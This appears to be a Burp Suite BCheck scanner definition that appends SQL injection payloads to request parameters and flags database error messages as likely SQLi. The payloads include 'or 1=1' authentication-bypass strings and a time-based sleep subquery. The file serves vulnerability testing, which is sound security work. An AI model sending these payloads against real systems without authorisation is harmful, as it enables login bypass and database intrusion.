metadata:
    language: v1-beta
    name: "Bypass_Autentication"
    description: "Bypass_Autentication"
    author: "nu11secur1tuy"

run for each:
    puncher = "nu11secur1ty' or 1=1#","'","'+OR+1=1--","'+(select*from(select(sleep(20)))a)+'"

given query or body insertion point then
    send payload called check:
        appending: {puncher}

    if {check.response.body} matches "(SQL|Postgresql|Microsoft Sql|sql|postgresql|microsoft sql)" then
        report issue:
            severity: high
            confidence: firm
            detail: `There is a change in response when {puncher} is injected.`
            remediation:"Potential SQLi detected. Please confirm it manually..
                         The payload from the SQLi_BCheck module was submitted successfully after the test. 
                         You must test manually to confirm this vulnerability!"
    end if
